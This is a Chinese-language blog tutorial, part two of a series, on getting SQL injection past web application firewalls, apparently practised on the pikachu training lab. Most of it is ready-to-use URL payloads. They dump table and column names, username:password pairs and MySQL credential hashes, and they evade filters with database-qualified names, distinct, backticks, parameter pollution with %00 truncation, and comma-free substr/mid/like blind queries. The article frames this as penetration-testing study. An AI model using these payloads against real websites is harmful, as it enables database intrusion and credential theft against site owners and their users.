文中详细讲解web安全之SQL注入的绕过技术,通过文中内容更加深入的掌握SQL注入绕过技术原理及使用方法,从而更好的用于渗透测试中;文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。
SQL注入绕过技术(二)
联合查询手工注入语法
爆出所有表
?name='union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+&submit=1
爆出user表中所有字段
?name='union select 1,group_concat(column_name) from information_schema.columns where table_name='users'--+&submit=1
爆出字段中username passowrd的值
?name='union select 1,group_concat(username,0x3a,password) from users--+&submit=1
0x3a是冒号的编码 ,便于区分两个值
添加库名绕过
在日常中,有的时候WAF的拦截规则并不能拦截[库名].[表名]这种模式,所以我们就可以利用这个来进行绕过:
?name='union select 1,(select group_concat(user,authentication_string) from mysql.user)--+&submit=1
这里是查看表中所有数据:
如果在浏览器中使用concat,那么就需要表后面跟上limit 1,否则会报错:
?name='union select 1,(select concat(user,authentication_string) from mysql.user limit 1)--+&submit=1
这样就可以只查看一行。
从上面就可以看出,当WAF上没有对这种方式进行限制时,我们则可以利用此方法跨库查看其中的表。
limit的用法
limit 0,1 #作用和limit 1相同
limit 1,1 #相当于查看这个表中的第二个数据 2,1 3,1 4,1 就是第三个 第四个 依此类推
limit 2 #查看表中前二个数据 3,4,5 依此类推
不过添加库名绕过方法,经测试只能查看mysql数据库内的表,其余库并不能查看:
从图中可以看出 我已在pichaku库中创建的user表且放入数据,但当跨库查看mysql时,可以查看,切换至moonsec库,同样可以查看,但查看pikachu中的user表则报错。
去重复绕过
在mysql查询可以使用distinct 去除查询的重复值。可以利用这点突破 waf 拦截来实现绕过:
select * from users where id=-1 union distinct select 1,2,3,4;
在浏览器中同样可以实现:
?name='union distinct select 1,user()--+&submit=1
使用all同样可以替换distinct。这个all或者distinct 写在union select中间或后面都可以。
反引号绕过
在mysql中同样可以使用反引号来突破waf来实现绕过:
?name='union select 1,(select version() from `users` limit 1)--+&submit=1
脚本语言特性绕过
在PHP中我们可以利用脚本语言的特性使用id=1&id=2,作用是后面的值会覆盖前面的值,从而突破waf实现绕过:
%00是截断,当WAF匹配到%00时,则会自动截断,从而不检测后面的内容,所以我们后面在使用SQL语句就可以成功获取数据。
?name=%00&name='union select 1,version()--+&submit=1
其他的语言同样也具备这样的特性绕过。
逗号绕过
因为在我们常规的注入中,是肯定会使用到逗号的,所以很多WAF就对逗号进行了拦截:
当我们使用substr这个函数的时候,则可以通过枚举的方式来获取数据库中的信息,从而突破waf实现绕过:
substr绕过
select (substr(database() from 1 for 1));
这样我们就可以通过枚举的方式获取信息,和limit一样,2 for 1 就显示第二位:
我们将这个语句拿到浏览器中执行:
?name=vince' and (select(substr(database() from 1 for 1)))='m'--+&submit=1
不是当前数据库的字母时,则返回错误页面:
是当前数据库的字母时,则返回正确页面:
同样为了防止过滤单引号,我们可以使用hex转换16进制来绕过:
?name=vince' and (select(substr(database() from 1 for 1)))=0x70--+&submit=1
mid绕过
mid的作用和substr函数功能相同,当如果substr被拦截或过滤,我们可以使用mid这个函数来代替:
?name=vince' and (select(mid(database() from 1 for 1)))=0x70--+&submit=1
like绕过
使用like同样是可以不使用逗号进行绕过:
?name=vince'and (select database() like '%a%')--+&submit=1
当数据库中存在这个字母,则返回正确页面:
当数据库中没有这个字母,则返回错误页面: